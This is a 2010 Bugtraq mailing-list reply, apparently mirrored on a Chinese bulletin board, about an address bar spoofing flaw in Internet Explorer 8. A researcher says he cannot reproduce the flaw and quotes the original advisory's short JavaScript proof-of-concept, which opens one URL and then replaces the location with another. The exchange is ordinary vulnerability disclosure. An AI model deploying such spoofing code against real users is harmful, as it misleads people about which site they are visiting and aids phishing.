Re: Internet Explorer 8.0 Address Bar Spoofing Vulnerability

看板Bugtraq作者時間15年前 (2010/07/27 02:01), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串2/2 (看更多)
cant replicate it on my test setup. is something missing? Shreyas Zare Sr. Information Security Researcher Secfence Technologies www.secfence.com On Sat, Jul 24, 2010 at 4:38 PM, <info@securitylab.ir> wrote: > Spoof Code: > > <script> > function Spoof() { > =A0oc=3Dwindow.open('http://www.securitylab.ir/', '','location=3D1'); > =A0oc.location.replace('http://www.microsoft.com/'); > } > </script> > <p align=3D"center"> > <a href=3D"javascript:void(0);" onClick=3D"Spoof()">Go to the Securitylab= ..ir</a></p> > > > Discovered by: Pouya Daneshmand > http://Securitylab.ir/Advisories >
文章代碼(AID): #1CJSrWke (Bugtraq)
文章代碼(AID): #1CJSrWke (Bugtraq)